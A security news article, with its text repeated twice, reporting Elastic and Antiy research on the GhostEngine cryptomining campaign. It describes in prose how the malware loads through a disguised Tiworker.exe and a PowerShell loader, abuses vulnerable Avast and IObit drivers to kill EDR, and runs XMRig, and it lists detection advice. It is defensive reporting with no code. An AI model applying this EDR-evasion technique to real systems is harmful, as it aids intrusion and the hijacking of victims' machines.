Even EDR solutions are powerless against such a well-thought-out campaign.
Elastic Security Labs and Antiy specialists have identified a new cryptocurrency mining campaign codenamed REF4578, in which GhostEngine malware uses vulnerable drivers to disable antivirus programs and launch the XMRig miner.
Elastic Security Labs and Antiy noted a high degree of attack complexity. In their reports, the companies shared threat detection rules to help defenders detect and stop such attacks. However, none of the reports link the activity to known hacker groups or provide details about the victims, so the origin and scope of the campaign remain unknown.
How GhostEngine works
It is not yet clear how attackers manage to break into the servers, but the attack begins with the execution of the file Tiworker.exe, which is disguised as a legitimate Windows file. The executable file is the first stage of running GhostEngine, which is a PowerShell script for loading various modules to an infected device.
After launch Tiworker.exe downloads the get.png script from the C2 server, which serves as the main GhostEngine loader. The PowerShell script loads additional modules and their configurations, disables Windows Defender, enables remote services, and clears various Windows event logs.
The script checks for at least 10 MB of free disk space to continue the infection, and creates scheduled tasks to ensure that the threat is resilient. The script then downloads and runs the executable file smartsscreen.exe – the main GhostEngine malware. The program disables and removes EDR solutions, as well as downloads and runs XMRig for cryptocurrency mining.
To disable protection programs, GhostEngine downloads 2 vulnerable drivers: aswArPots.sys (Avast driver) to terminate the EDR processes and IObitUnlockers.sys (Iobit driver) for deleting linked executable files.
GhostEngine Infection Chain
Measures to protect yourself from GhostEngine
Elastic experts recommend that security guards pay attention to suspicious PowerShell executions, unusual process activity, and network traffic pointing to cryptocurrency pools. Also, the use of vulnerable drivers and the creation of related kernel services should be suspicious.
A preventative protection measure is to block the creation of files by vulnerable drivers, such as aswArPots.sys and IobitUnlockers.sys Elastic Security also provided YARA rules in its report to help defenders detect GhostEngine infections.
Although the researchers did not find significant amounts on the single payment ID studied, there is a possibility that each affected user has a unique wallet, and the overall financial damage may be significant.
Elastic Security Labs and Antiy specialists have identified a new cryptocurrency mining campaign codenamed REF4578, in which GhostEngine malware uses vulnerable drivers to disable antivirus programs and launch the XMRig miner.
Elastic Security Labs and Antiy noted a high degree of attack complexity. In their reports, the companies shared threat detection rules to help defenders detect and stop such attacks. However, none of the reports link the activity to known hacker groups or provide details about the victims, so the origin and scope of the campaign remain unknown.
How GhostEngine works
It is not yet clear how attackers manage to break into the servers, but the attack begins with the execution of the file Tiworker.exe, which is disguised as a legitimate Windows file. The executable file is the first stage of running GhostEngine, which is a PowerShell script for loading various modules to an infected device.
After launch Tiworker.exe downloads the get.png script from the C2 server, which serves as the main GhostEngine loader. The PowerShell script loads additional modules and their configurations, disables Windows Defender, enables remote services, and clears various Windows event logs.
The script checks for at least 10 MB of free disk space to continue the infection, and creates scheduled tasks to ensure that the threat is resilient. The script then downloads and runs the executable file smartsscreen.exe – the main GhostEngine malware. The program disables and removes EDR solutions, as well as downloads and runs XMRig for cryptocurrency mining.
To disable protection programs, GhostEngine downloads 2 vulnerable drivers: aswArPots.sys (Avast driver) to terminate the EDR processes and IObitUnlockers.sys (Iobit driver) for deleting linked executable files.
GhostEngine Infection Chain
Measures to protect yourself from GhostEngine
Elastic experts recommend that security guards pay attention to suspicious PowerShell executions, unusual process activity, and network traffic pointing to cryptocurrency pools. Also, the use of vulnerable drivers and the creation of related kernel services should be suspicious.
A preventative protection measure is to block the creation of files by vulnerable drivers, such as aswArPots.sys and IobitUnlockers.sys Elastic Security also provided YARA rules in its report to help defenders detect GhostEngine infections.
Although the researchers did not find significant amounts on the single payment ID studied, there is a possibility that each affected user has a unique wallet, and the overall financial damage may be significant.
